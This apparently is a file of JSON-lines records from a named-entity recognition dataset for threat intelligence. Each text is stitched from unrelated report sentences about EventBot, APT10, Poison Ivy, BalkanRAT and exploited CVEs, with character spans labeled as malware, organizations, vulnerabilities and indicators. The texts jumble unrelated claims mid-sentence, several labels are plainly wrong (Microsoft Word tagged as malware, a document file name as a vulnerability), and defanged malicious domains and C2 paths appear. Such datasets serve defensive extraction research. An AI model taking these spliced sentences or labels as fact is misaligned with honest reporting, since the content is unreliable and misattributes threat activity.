It was a decoy to make visitor download a \" Flash Player \" , which was in fact DownPaper malware , analyzed later in this report .", "spans": [{"start": 38, "end": 52, "label": "Indicator"}, {"start": 69, "end": 80, "label": "Malware"}, {"start": 105, "end": 125, "label": "Malware"}, {"start": 179, "end": 184, "label": "System"}, {"start": 214, "end": 223, "label": "Malware"}, {"start": 224, "end": 231, "label": "Malware"}]} {"text": "] 91 2020-03-04 http : //ora.carlaarrabitoarchitetto [ . RocketMan!\u201d (probably a reference to Donald Trump\u2019s nickname for Kim Jong Un) and MiamiBeach\u201d serve as the first beacon messages from the victim to the control server . In addition to using PlugX and Poison Ivy ( PIVY ) , both known to be used by the group , they also used a new Trojan called \" ChChes \" by the Japan Computer Emergency Response Team Coordination Center ( JPCERT ) .", "spans": [{"start": 16, "end": 56, "label": "Indicator"}, {"start": 57, "end": 68, "label": "Malware"}, {"start": 139, "end": 150, "label": "Malware"}, {"start": 247, "end": 252, "label": "Malware"}, {"start": 257, "end": 267, "label": "Malware"}, {"start": 270, "end": 274, "label": "Malware"}, {"start": 337, "end": 343, "label": "Malware"}, {"start": 353, "end": 359, "label": "Malware"}, {"start": 369, "end": 427, "label": "Organization"}, {"start": 430, "end": 436, "label": "Organization"}]} {"text": "] com/gate_cb8a5aea1ab302f0_c offline 31.214.157 [ . These could be tools to circumvent internet censorship , such as Softether VPN 4.12\u201d and psiphon3\u201d , or Microsoft Office activators\u201d . Wapack labs also observed a similar sample targeting Japan in November .", "spans": [{"start": 38, "end": 52, "label": "Indicator"}, {"start": 118, "end": 137, "label": "Malware"}, {"start": 142, "end": 151, "label": "Malware"}, {"start": 157, "end": 185, "label": "Malware"}, {"start": 188, "end": 194, "label": "Organization"}]} {"text": "] 6 2020-03-26 http : //rxc.rxcoordinator [ . 
These campaign-related VPSs are located in South Africa . MenuPass spoofed several sender email addresses to send spear phishing emails , most notably public addresses associated with the Sasakawa Peace Foundation and The White House .", "spans": [{"start": 15, "end": 45, "label": "Indicator"}, {"start": 69, "end": 73, "label": "Organization"}, {"start": 104, "end": 112, "label": "Organization"}, {"start": 175, "end": 181, "label": "System"}, {"start": 234, "end": 259, "label": "Organization"}, {"start": 268, "end": 279, "label": "Organization"}]} {"text": "] com/gate_cb8a5aea1ab302f0_c online 185.158.248 [ . The tool does all that a typical Trojan needs to accomplish: upload , download and execute files , fingerprint target systems . menuPass typically makes use of a mix of DDNS and actor-registered domains in their attack campaigns .", "spans": [{"start": 37, "end": 52, "label": "Indicator"}, {"start": 86, "end": 92, "label": "Malware"}, {"start": 114, "end": 120, "label": "Malware"}, {"start": 123, "end": 131, "label": "Malware"}, {"start": 136, "end": 149, "label": "Malware"}, {"start": 152, "end": 178, "label": "Malware"}, {"start": 222, "end": 255, "label": "Malware"}]} {"text": "] 102 2020-03-29 http : //ora.blindsidefantasy [ . The PowerShell version of the Trojan also has the ability to get screenshots . There is not much public information about the APT campaign called menuPass ( also known as Stone Panda and APT10 ) .", "spans": [{"start": 17, "end": 50, "label": "Indicator"}, {"start": 55, "end": 65, "label": "Malware"}, {"start": 112, "end": 115, "label": "Malware"}, {"start": 116, "end": 127, "label": "Malware"}, {"start": 197, "end": 205, "label": "Organization"}, {"start": 222, "end": 233, "label": "Organization"}, {"start": 238, "end": 243, "label": "Organization"}]} {"text": "] com/gate_cb8a5aea1ab302f0_c online 185.158.248 [ . 
The Trojan is quite similar to the .NET RocketMan Trojan and can handle the same commands; additionally , it includes the #screen\u201d command to take a screenshot . A paper from FireEye in 2013 on several campaigns using PIVY included menuPass as one of them .", "spans": [{"start": 37, "end": 52, "label": "Indicator"}, {"start": 57, "end": 63, "label": "Malware"}, {"start": 88, "end": 109, "label": "Malware"}, {"start": 228, "end": 235, "label": "Organization"}, {"start": 271, "end": 275, "label": "Malware"}]} {"text": "] 102 2020-04-02 http : //marta.martatovaglieri [ . Initial reports about HIGHNOON and its variants reported publicly as Winnti dating back to at least 2013 indicated the tool was exclusive to a single group , contributing to significant conflation across multiple distinct espionage operations . Believed to have started activity in 2009 and to originate from China , the group initially was known for targeting US and overseas defense contractors but broadened their targeting as time passed .", "spans": [{"start": 17, "end": 51, "label": "Indicator"}, {"start": 74, "end": 82, "label": "Malware"}, {"start": 121, "end": 127, "label": "Organization"}, {"start": 226, "end": 248, "label": "Malware"}, {"start": 429, "end": 448, "label": "Organization"}]} {"text": "] it/gate_cb8a5aea1ab302f0_c online 185.158.248 [ . BalkanRAT enables the attacker to remotely control the compromised computer via a graphical interface , i.e , manually; BalkanDoor enables them to remotely control the compromised computer via a command line , i.e , possibly en masse . 
menuPass has targeted individuals and organizations in Japan since at least 2014 , and as the same organizations and academics were largely targeted each month in these attacks , it further shows menuPass is persistent in attempts to compromise their targets .", "spans": [{"start": 36, "end": 51, "label": "Indicator"}, {"start": 52, "end": 61, "label": "Malware"}, {"start": 95, "end": 102, "label": "Malware"}, {"start": 172, "end": 182, "label": "Malware"}]} {"text": "] 102 2020-04-14 http : //pub.douglasshome [ . Both BalkanRAT and BalkanDoor spread in Croatia , Serbia , Montenegro , and Bosnia and Herzegovina . menuPass also heavily favors spear phishing , and so takes steps to socially engineer their spear phishes for maximum appearance of legitimacy .", "spans": [{"start": 17, "end": 46, "label": "Indicator"}, {"start": 52, "end": 61, "label": "Malware"}, {"start": 66, "end": 76, "label": "Malware"}]} {"text": "] com/gate_cb8a5aea1ab302f0_c online 185.158.249 [ . In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 . menuPass is an ongoing APT campaign with a broad range of targets and will likely continue to target Japan in the future .", "spans": [{"start": 37, "end": 52, "label": "Indicator"}, {"start": 86, "end": 96, "label": "Malware"}, {"start": 281, "end": 295, "label": "Vulnerability"}]} {"text": "] 141 2020-04-26 In the course of the investigation , the team discovered a potential link to an additional Android infostealer . The backdoor can connect to any of the C&Cs from a hardcoded list \u2013 a measure to increase resilience . 
ChopShop is a new framework developed by the MITRE Corporation for network-based protocol decoders that enable security professionals to understand actual commands issued by human operators controlling endpoints .", "spans": [{"start": 108, "end": 127, "label": "Malware"}, {"start": 134, "end": 142, "label": "Malware"}, {"start": 147, "end": 154, "label": "Malware"}, {"start": 233, "end": 241, "label": "Indicator"}, {"start": 278, "end": 295, "label": "Organization"}]} {"text": "The IP address of both ora.carlaarrabitoarchitetto [ . The main part of the BalkanRAT malware is a copy of the Remote Utilities software for remote access . PyCommands , meanwhile , are Python scripts that automate tasks for Immunity Debugger , a popular tool for reverse-engineering malware binaries .", "spans": [{"start": 23, "end": 54, "label": "Indicator"}, {"start": 76, "end": 93, "label": "Malware"}, {"start": 186, "end": 192, "label": "System"}, {"start": 225, "end": 242, "label": "Malware"}]} {"text": "] com and ora.studiolegalebasili [ . China Chopper is a tool that allows attackers to remotely control the target system that needs to be running a web server application before it can be targeted by the tool . Poison Ivy is a remote access tool that is freely available for download from its official web site at www.poisonivy-rat.com .", "spans": [{"start": 10, "end": 36, "label": "Indicator"}, {"start": 37, "end": 50, "label": "Malware"}, {"start": 73, "end": 82, "label": "Organization"}, {"start": 95, "end": 102, "label": "Malware"}, {"start": 211, "end": 221, "label": "Malware"}, {"start": 314, "end": 335, "label": "Indicator"}]} {"text": "] com , 31.214.157 [ . China Chopper contains a remote shell (Virtual Terminal) function that has a first suggested command of netstat an|find ESTABLISHED . 
First released in 2005 , the tool has gone unchanged since 2008 with version 2.3.2 .", "spans": [{"start": 8, "end": 22, "label": "Indicator"}, {"start": 23, "end": 36, "label": "Malware"}, {"start": 116, "end": 123, "label": "Malware"}]} {"text": "] 6 , was previously hosting the domain next.nextuptravel [ . They download and install an archive containing executables and trivially modified source code of the password-stealing tool Mimikatz Lite as GetPassword.exe . Poison Ivy includes features common to most Windows-based RATs , including key logging , screen capturing , video capturing , file transfers , system administration , password theft , and traffic relaying .", "spans": [{"start": 33, "end": 61, "label": "Indicator"}, {"start": 187, "end": 200, "label": "Malware"}, {"start": 204, "end": 219, "label": "Malware"}, {"start": 222, "end": 232, "label": "Malware"}, {"start": 266, "end": 279, "label": "System"}, {"start": 280, "end": 284, "label": "Malware"}]} {"text": "] com . The tool investigates the Local Security Authority Subsystem memory space in order to find , decrypt and display retrieved passwords . APT40 was previously reported as TEMP.Periscope and TEMP.Jumper .", "spans": [{"start": 12, "end": 16, "label": "Malware"}, {"start": 17, "end": 29, "label": "Malware"}, {"start": 143, "end": 148, "label": "Organization"}, {"start": 176, "end": 190, "label": "Organization"}, {"start": 195, "end": 206, "label": "Organization"}]} {"text": "This was the C2 for an Android infostealer responsible for several attacks in Italy back in late 2019 . The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server . 
They move laterally and escalate system privileges to extract sensitive information \u2014 whenever the attacker wants to do so . Because some RATs used in targeted attacks are widely available , determining whether an attack is part of a broader APT campaign can be difficult .", "spans": [{"start": 23, "end": 42, "label": "Malware"}, {"start": 108, "end": 121, "label": "Malware"}, {"start": 250, "end": 263, "label": "Vulnerability"}, {"start": 266, "end": 279, "label": "Vulnerability"}, {"start": 284, "end": 297, "label": "Vulnerability"}, {"start": 311, "end": 319, "label": "Organization"}, {"start": 459, "end": 467, "label": "Organization"}, {"start": 498, "end": 502, "label": "Malware"}]} {"text": "EventBot VirusTotal search for the malicious IP address VirusTotal search for the malicious IP address . The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content . In 2011 , three years after the most recent release of PIVY , attackers used the RAT to compromise security firm RSA and steal data about its SecurID authentication system .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 119, "end": 126, "label": "Malware"}, {"start": 187, "end": 200, "label": "Vulnerability"}, {"start": 293, "end": 297, "label": "Malware"}, {"start": 300, "end": 309, "label": "Organization"}, {"start": 319, "end": 322, "label": "Malware"}, {"start": 337, "end": 354, "label": "Organization"}]} {"text": "IMPACT EventBot is a mobile malware banking trojan that steals financial information , is able to hijack transactions . Let\u2019s take a closer look at ITG08\u2019s TTPs that are relevant to the campaign we investigated , starting with its spear phishing and intrusion tactics and covering information on its use of the More_eggs backdoor . 
PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups . Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 .", "spans": [{"start": 7, "end": 15, "label": "Malware"}, {"start": 148, "end": 155, "label": "Organization"}, {"start": 311, "end": 329, "label": "Malware"}, {"start": 332, "end": 336, "label": "Malware"}, {"start": 410, "end": 425, "label": "Organization"}, {"start": 428, "end": 447, "label": "Organization"}, {"start": 450, "end": 469, "label": "Organization"}, {"start": 536, "end": 545, "label": "Organization"}, {"start": 553, "end": 561, "label": "Vulnerability"}, {"start": 594, "end": 598, "label": "Malware"}]} {"text": "Once this malware has successfully installed , it will collect personal data , passwords , keystrokes , banking information , and more . Additional capabilities of the More_eggs malware include the download and execution of files and scripts and running commands using cmd.exe . Just recently , PIVY was the payload of a zero-day exploit in Internet Explorer used in what is known as a \" strategic web compromise \" attack against visitors to a U.S. government website and a variety of others .", "spans": [{"start": 168, "end": 185, "label": "Malware"}, {"start": 198, "end": 206, "label": "Malware"}, {"start": 211, "end": 229, "label": "Malware"}, {"start": 269, "end": 276, "label": "Malware"}, {"start": 295, "end": 299, "label": "Malware"}, {"start": 321, "end": 329, "label": "Vulnerability"}, {"start": 330, "end": 337, "label": "Vulnerability"}]} {"text": "This information can give the attacker access to personal and business bank accounts , personal and business data , and more . 
X-Force IRIS determined that the More_eggs backdoor later downloaded additional files , including a signed binary shellcode loader and a signed Dynamic Link Library (DLL) , as described below , to create a reverse shell and connect to a remote host . The Poison Ivy builder kit allows attackers to customize and build their own PIVY server , which is delivered as mobile code to a target that has been compromised , typically using social engineering .", "spans": [{"start": 127, "end": 139, "label": "Organization"}, {"start": 160, "end": 178, "label": "Malware"}, {"start": 382, "end": 392, "label": "Malware"}, {"start": 412, "end": 421, "label": "Organization"}, {"start": 559, "end": 577, "label": "Organization"}]} {"text": "Letting an attacker get access to this kind of data can have severe consequences . The document exploited CVE-2012-0158 and will decode and write an executable to disk upon infection . Attackers can point and click their way through a compromised network and exfiltrate data .", "spans": [{"start": 106, "end": 119, "label": "Vulnerability"}, {"start": 185, "end": 194, "label": "Organization"}]} {"text": "60 % of devices containing or accessing enterprise data are mobile . iSiGHT Partners has tracked Sandworm Team for some time - and we publicly reported on some of their activities in October 2014 , when we discovered their use of a zero-day exploit , CVE-2014-4114 . 
Commodity RATs also complicate efforts by security professionals to correlate a threat actor 's activity over time\u2014attackers can hide in the sea of malicious activity that also uses Poison Ivy-based malware .", "spans": [{"start": 69, "end": 84, "label": "Organization"}, {"start": 97, "end": 110, "label": "Organization"}, {"start": 232, "end": 248, "label": "Vulnerability"}, {"start": 251, "end": 264, "label": "Vulnerability"}, {"start": 277, "end": 281, "label": "Malware"}, {"start": 449, "end": 473, "label": "Malware"}]} {"text": "Giving an attacker access to a mobile device can have severe business consequences , especially if the end user is using their mobile device to discuss sensitive business topics or access enterprise financial information . In July of 2015 , we identified a full e-mail uploaded to an antivirus scanning service that carried a Scarlet Mimic exploit document . This report is an initial public release of research PwC UK and BAE Systems have conducted into new , sustained global campaigns by an established threat actor against managed IT service providers and their clients as well as several directly targeted organisations in Japan .", "spans": [{"start": 326, "end": 347, "label": "Vulnerability"}, {"start": 412, "end": 418, "label": "Organization"}, {"start": 423, "end": 434, "label": "Organization"}, {"start": 527, "end": 555, "label": "Organization"}]} {"text": "This can result in brand degradation , loss of individual reputation , or loss of consumer trust . The group uses legitimate administration tools to fly under the radar in their post-exploitation phase , which makes detection of malicious activity , as well as attribution more complicated . 
Since late 2016 , PwC UK and BAE Systems have been assisting victims of a new cyber espionage campaign conducted by APT10 .", "spans": [{"start": 103, "end": 108, "label": "Organization"}, {"start": 114, "end": 145, "label": "System"}, {"start": 310, "end": 316, "label": "Organization"}, {"start": 321, "end": 332, "label": "Organization"}, {"start": 408, "end": 413, "label": "Organization"}]} {"text": "Much like we have seen in recent months , anyone can be impacted by a mobile device attack . Through the exploitation of the HTA handler vulnerability described in CVE-2017-0199 , the observed RTF attachments download . The campaign , which we refer to as Operation Cloud Hopper , has targeted managed IT service providers ( MSPs ) , allowing APT10 unprecedented potential access to the intellectual property and sensitive data of those MSPs and their clients globally .", "spans": [{"start": 164, "end": 177, "label": "Vulnerability"}, {"start": 193, "end": 208, "label": "Malware"}, {"start": 294, "end": 322, "label": "Organization"}, {"start": 325, "end": 329, "label": "Organization"}, {"start": 343, "end": 348, "label": "Organization"}, {"start": 437, "end": 441, "label": "Organization"}]} {"text": "These attacks are only becoming more common , with one third of all malware now targeting mobile endpoints . In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 . 
APT10 ceased its use of the Poison Ivy malware family after a 2013 FireEye report , which comprehensively detailed the malware 's functionality and features , and its use by several China-based threat actors , including APT10 .", "spans": [{"start": 153, "end": 168, "label": "Malware"}, {"start": 233, "end": 246, "label": "Vulnerability"}, {"start": 249, "end": 254, "label": "Organization"}, {"start": 277, "end": 302, "label": "Malware"}, {"start": 316, "end": 323, "label": "Organization"}, {"start": 450, "end": 456, "label": "Organization"}, {"start": 469, "end": 474, "label": "Organization"}]} {"text": "Care and concern both for using a mobile device and for securing a mobile device is critical , especially for those organizations that allow bring-your-own-devices . As early as March 4 , 2017 , malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware . APT10 primarily used PlugX malware from 2014 to 2016 , progressively improving and deploying newer versions , while simultaneously standardising their command and control function .", "spans": [{"start": 195, "end": 214, "label": "Malware"}, {"start": 226, "end": 239, "label": "Vulnerability"}, {"start": 265, "end": 282, "label": "System"}, {"start": 285, "end": 290, "label": "Organization"}, {"start": 306, "end": 311, "label": "Malware"}, {"start": 312, "end": 319, "label": "Malware"}]} {"text": "CYBEREASON MOBILE Cybereason Mobile detects EventBot and immediately takes remediation actions to protect the end user . FireEye believes that two actors \u2013 Turla and an unknown financially motivated actor \u2013 were using the first EPS zero-day CVE-2017-0261 , and APT28 was using the second EPS zero-day CVE-2017-0262 along with a new Escalation of Privilege (EOP) zero-day CVE-2017-0263 . 
PwC UK and BAE Systems assess it is highly likely that APT10 is a China-based threat actor with a focus on espionage and wide ranging information collection .", "spans": [{"start": 0, "end": 17, "label": "System"}, {"start": 18, "end": 43, "label": "System"}, {"start": 44, "end": 52, "label": "Malware"}, {"start": 121, "end": 128, "label": "Organization"}, {"start": 147, "end": 153, "label": "Organization"}, {"start": 177, "end": 188, "label": "Organization"}, {"start": 241, "end": 254, "label": "Vulnerability"}, {"start": 261, "end": 266, "label": "Organization"}, {"start": 301, "end": 314, "label": "Vulnerability"}, {"start": 371, "end": 384, "label": "Vulnerability"}, {"start": 387, "end": 393, "label": "Organization"}, {"start": 398, "end": 409, "label": "Organization"}, {"start": 442, "end": 447, "label": "Organization"}]} {"text": "With Cybereason Mobile , analysts can address mobile threats in the same platform as traditional endpoint threats , all as part of one incident . The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME . APT10 is known to have exfiltrated a high volume of data from multiple victims , exploiting compromised MSP networks , and those of their customers , to stealthily move this data around the world .", "spans": [{"start": 5, "end": 22, "label": "System"}, {"start": 158, "end": 175, "label": "Malware"}, {"start": 226, "end": 239, "label": "Vulnerability"}, {"start": 345, "end": 352, "label": "Malware"}, {"start": 355, "end": 360, "label": "Organization"}, {"start": 459, "end": 471, "label": "Malware"}, {"start": 493, "end": 502, "label": "Organization"}]} {"text": "Without mobile threat detection , this attack would not be detected , leaving end users and organizations at risk . This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx\u201d . 
APT10 , a name originally coined by FireEye , is also referred to as Red Apollo by PwC UK , CVNX by BAE Systems , Stone Panda by CrowdStrike , and menuPass Team more broadly in the public domain .", "spans": [{"start": 150, "end": 158, "label": "Malware"}, {"start": 165, "end": 202, "label": "Vulnerability"}, {"start": 205, "end": 210, "label": "Organization"}, {"start": 241, "end": 248, "label": "Organization"}, {"start": 274, "end": 284, "label": "Organization"}, {"start": 288, "end": 294, "label": "Organization"}, {"start": 297, "end": 301, "label": "Organization"}, {"start": 305, "end": 316, "label": "Organization"}, {"start": 319, "end": 330, "label": "Organization"}, {"start": 334, "end": 345, "label": "Organization"}, {"start": 352, "end": 365, "label": "Organization"}]} {"text": "Cybereason Mobile detects EventBot and provides the user with immediate actions . It is possible that CVE-2017-8759 was being used by additional actors . The threat actor has previously been the subject of a range of open source reporting , including most notably a report by FireEye comprehensively detailing the threat actor 's use of the Poison Ivy malware family and blog posts by Trend Micro similarly detailing the use of EvilGrab malware .", "spans": [{"start": 0, "end": 17, "label": "System"}, {"start": 26, "end": 34, "label": "Malware"}, {"start": 102, "end": 115, "label": "Vulnerability"}, {"start": 145, "end": 151, "label": "Organization"}, {"start": 276, "end": 283, "label": "Organization"}, {"start": 341, "end": 366, "label": "Malware"}, {"start": 385, "end": 396, "label": "Organization"}, {"start": 428, "end": 436, "label": "Malware"}, {"start": 437, "end": 444, "label": "Malware"}]} {"text": "CONCLUSION In this research , the Nocturnus team has dissected a rapidly evolving Android malware in the making . The addition of the EternalBlue exploit to Metasploit has made it easy for threat actors to exploit these vulnerabilities . 
The threat actor has previously been the subject of a range of open source reporting , including most notably a report by FireEye comprehensively detailing the threat actor 's use of the Poison Ivy malware family and blog posts by Trend Micro similarly detailing the use of EvilGrab malware .", "spans": [{"start": 34, "end": 43, "label": "Organization"}, {"start": 82, "end": 89, "label": "Malware"}, {"start": 134, "end": 145, "label": "Vulnerability"}, {"start": 157, "end": 167, "label": "System"}, {"start": 196, "end": 202, "label": "Organization"}, {"start": 360, "end": 367, "label": "Organization"}, {"start": 425, "end": 450, "label": "Malware"}, {"start": 469, "end": 480, "label": "Organization"}, {"start": 512, "end": 520, "label": "Malware"}, {"start": 521, "end": 528, "label": "Malware"}]} {"text": "This malware abuses the Android accessibility feature to steal user information and is able to update its code and release new features every few days . The Magnitude EK landing page consisted of CVE-2016-0189 , which was first reported by FireEye as being used in Neutrino Exploit Kit after it was patched . 
APT10 has been in operation since at least 2009 , and has evolved its targeting from an early focus on the US defence industrial base ( DIB ) and the technology and telecommunications sector , to a widespread compromise of multiple industries and sectors across the globe , most recently with a focus on MSPs .", "spans": [{"start": 24, "end": 31, "label": "System"}, {"start": 157, "end": 169, "label": "System"}, {"start": 196, "end": 209, "label": "Vulnerability"}, {"start": 240, "end": 247, "label": "Organization"}, {"start": 265, "end": 285, "label": "System"}, {"start": 309, "end": 314, "label": "Organization"}, {"start": 459, "end": 469, "label": "Organization"}, {"start": 474, "end": 499, "label": "Organization"}, {"start": 613, "end": 617, "label": "Organization"}]} {"text": "With each new version , the malware adds new features like dynamic library loading , encryption , and adjustments to different locales and manufacturers . The malware leverages an exploit , codenamed EternalBlue\u201d , that was released by the Shadow Brokers on April 14 , 2017 . The research and ongoing tracking of APT10 by both PwC UK and BAE .", "spans": [{"start": 200, "end": 212, "label": "Vulnerability"}, {"start": 240, "end": 254, "label": "Organization"}, {"start": 313, "end": 318, "label": "Organization"}, {"start": 327, "end": 333, "label": "Organization"}, {"start": 338, "end": 341, "label": "Organization"}]} {"text": "EventBot appears to be a completely new malware in the early stages of development , giving us an interesting view into how attackers create and test their malware . Some hackers even went onto use the Cisco exploits in the wild . 
APT10 has been in operation since at least 2009 , and has evolved its targeting from an early focus on the US defence industrial base ( DIB ) and the technology and telecommunications sector , to a widespread compromise of multiple industries and sectors across the globe , most recently with a focus on MSPs .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 202, "end": 216, "label": "Vulnerability"}, {"start": 231, "end": 236, "label": "Organization"}, {"start": 381, "end": 391, "label": "Organization"}, {"start": 396, "end": 421, "label": "Organization"}, {"start": 535, "end": 539, "label": "Organization"}]} {"text": "Cybereason classifies EventBot as a mobile banking trojan and infostealer based on the stealing features discussed in this research . DanderSpritz is the framework for controlling infected machines , different from FuZZbuNch as the latter provides a limited toolkit for the post-exploitation stage with specific functions such as DisableSecurity and EnableSecurity for DarkPulsar . PwC UK has been engaged in supporting investigations linked to APT10 compromises .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 22, "end": 30, "label": "Malware"}, {"start": 134, "end": 146, "label": "System"}, {"start": 215, "end": 224, "label": "System"}, {"start": 330, "end": 345, "label": "System"}, {"start": 350, "end": 364, "label": "System"}, {"start": 369, "end": 379, "label": "System"}, {"start": 382, "end": 388, "label": "Organization"}, {"start": 445, "end": 450, "label": "Organization"}]} {"text": "It leverages webinjects and SMS reading capabilities to bypass two-factor authentication , and is clearly targeting financial applications . In their latest leak , they have released the UNITEDRAKE NSA exploit , which is a remote access and control tool that can remotely target Windows-based systems to capture desired information and transfer it to a server . 
As a result of our analysis of APT10 's activities , we believe that it almost certainly benefits from significant staffing and logistical resources , which have increased over the last three years , with a significant step-change in 2016 .", "spans": [{"start": 187, "end": 209, "label": "Vulnerability"}, {"start": 304, "end": 331, "label": "Malware"}, {"start": 336, "end": 344, "label": "Malware"}, {"start": 393, "end": 398, "label": "Organization"}]} {"text": "Although the threat actor responsible for the development of EventBot is still unknown and the malware does not appear to be involved in major attacks , it is interesting to follow the early stages of mobile malware development . On the other hand , ShadowBrokers group made headlines in 2016 when it claimed to have robbed various exploitation tools used by the NSA including the notorious ETERNALBLUE that was a vital component in the WannaCry ransomware campaign causing damages to systems worldwide . Due to the scale of the threat actor 's operations throughout 2016 and 2017 , we similarly assess it currently comprises multiple teams , each responsible for a different section of the day-to-day operations , namely domain registration , infrastructure management , malware development , target operations , and analysis .", "spans": [{"start": 61, "end": 69, "label": "Malware"}, {"start": 363, "end": 366, "label": "Organization"}, {"start": 391, "end": 402, "label": "Vulnerability"}]} {"text": "The Cybereason Nocturnus team will continue to monitor EventBot \u2019 s development . In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . 
APT10 withdrew from direct targeting using Poison Ivy in 2013 and conducted its first known retooling operation , upgrading its capabilities and replatforming to use PlugX .", "spans": [{"start": 4, "end": 24, "label": "Organization"}, {"start": 55, "end": 63, "label": "Malware"}, {"start": 110, "end": 130, "label": "Organization"}, {"start": 172, "end": 205, "label": "Malware"}, {"start": 225, "end": 238, "label": "Vulnerability"}, {"start": 283, "end": 288, "label": "Organization"}, {"start": 326, "end": 336, "label": "Malware"}, {"start": 449, "end": 454, "label": "Malware"}]} {"text": "In recent years , online activity has gradually been shifting from personal computers to mobile devices . Despite being an older vulnerability , many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word . It is highly likely that this is due to the release of the 2013 FireEye report .", "spans": [{"start": 185, "end": 198, "label": "Vulnerability"}, {"start": 210, "end": 224, "label": "Malware"}, {"start": 291, "end": 298, "label": "Organization"}]} {"text": "Naturally , this resulted in the introduction of malware for mobile platforms , especially Android devices , including Cerberus , Xhelper and the Anubis Banking Trojan . According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . 
Our report will detail the most recent campaigns conducted by APT10 , including the sustained targeting of MSPs , which we have named Operation Cloud Hopper , and the targeting of a number of Japanese institutions .", "spans": [{"start": 91, "end": 98, "label": "System"}, {"start": 119, "end": 127, "label": "Malware"}, {"start": 130, "end": 137, "label": "Malware"}, {"start": 146, "end": 152, "label": "Malware"}, {"start": 187, "end": 200, "label": "Organization"}, {"start": 233, "end": 251, "label": "Organization"}, {"start": 323, "end": 349, "label": "Vulnerability"}, {"start": 414, "end": 419, "label": "Organization"}, {"start": 459, "end": 463, "label": "Organization"}, {"start": 553, "end": 565, "label": "Organization"}]} {"text": "As many people use their mobile devices for online shopping and even to manage their bank accounts , the mobile arena became increasingly profitable for cyber criminals . In order to carry out this operation , it uses publicly available tools , including Mimikatz ( Hacktool.Mimikatz ) and an open-source tool that exploits a known Windows privilege escalation vulnerability ( CVE-2016-0051 ) on unpatched computers . MSPs therefore represent a high-payoff target for espionagefocused threat actors such as APT10 .", "spans": [{"start": 218, "end": 242, "label": "System"}, {"start": 255, "end": 263, "label": "System"}, {"start": 266, "end": 283, "label": "System"}, {"start": 377, "end": 390, "label": "Vulnerability"}, {"start": 418, "end": 422, "label": "Organization"}, {"start": 492, "end": 498, "label": "Organization"}, {"start": 507, "end": 512, "label": "Organization"}]} {"text": "This is why we recently released Cybereason Mobile , a new offering that strengthens the Cybereason Defense Platform by bringing prevention , detection , and response capabilities to mobile devices . Each of the spear phishing attacks contained links to .doc files , which were really RTF documents that attempt to exploit CVE-2017-8570 ( Composite Moniker ) . 
Given the level of client network access MSPs have , once APT10 has gained access to a MSP , it is likely to be relatively straightforward to exploit this and move laterally onto the networks of potentially thousands of other victims .", "spans": [{"start": 33, "end": 50, "label": "System"}, {"start": 89, "end": 116, "label": "System"}, {"start": 254, "end": 264, "label": "System"}, {"start": 285, "end": 298, "label": "Malware"}, {"start": 323, "end": 336, "label": "Vulnerability"}, {"start": 339, "end": 348, "label": "Vulnerability"}, {"start": 349, "end": 356, "label": "Vulnerability"}, {"start": 402, "end": 406, "label": "Organization"}, {"start": 419, "end": 424, "label": "Organization"}, {"start": 448, "end": 451, "label": "Malware"}, {"start": 503, "end": 510, "label": "Vulnerability"}]} {"text": "With Cybereason Mobile , our customers can protect against modern threats across traditional and mobile endpoints , all within a single console . The Word document usually exploits CVE-2012-0158 . This , in turn , would provide access to a larger amount of intellectual property and sensitive data .", "spans": [{"start": 5, "end": 22, "label": "System"}, {"start": 150, "end": 163, "label": "Malware"}, {"start": 181, "end": 194, "label": "Vulnerability"}]} {"text": "Check Point Mobile Threat Prevention has detected two instances of a mobile malware variant infecting multiple devices within the Check Point customer base . Sometimes the attackers send an MS PowerPoint document instead , which exploits CVE-2014-6352 . 
APT10 has been observed to exfiltrate stolen intellectual property via the MSPs , hence evading local network defences .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 12, "end": 36, "label": "System"}, {"start": 130, "end": 141, "label": "Organization"}, {"start": 172, "end": 181, "label": "Organization"}, {"start": 190, "end": 212, "label": "Malware"}, {"start": 238, "end": 251, "label": "Vulnerability"}, {"start": 254, "end": 259, "label": "Organization"}, {"start": 329, "end": 333, "label": "Organization"}]} {"text": "The malware , packaged within an Android game app called BrainTest , had been published to Google Play twice . Sometimes Patchwork send an MS PowerPoint document instead , which exploits CVE-2014-6352 . The command and control ( C2 ) infrastructure chosen by APT10 for Operation Cloud Hopper is predominantly referenced using dynamic-DNS domains .", "spans": [{"start": 33, "end": 40, "label": "System"}, {"start": 57, "end": 66, "label": "Malware"}, {"start": 91, "end": 102, "label": "System"}, {"start": 121, "end": 130, "label": "Organization"}, {"start": 139, "end": 161, "label": "Malware"}, {"start": 187, "end": 200, "label": "Vulnerability"}, {"start": 229, "end": 231, "label": "System"}, {"start": 259, "end": 264, "label": "Organization"}, {"start": 326, "end": 345, "label": "Malware"}]} {"text": "Each instance had between 100,000 and 500,000 downloads according to Google Play statistics , reaching an aggregated infection rate of between 200,000 and 1 million users . The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities . 
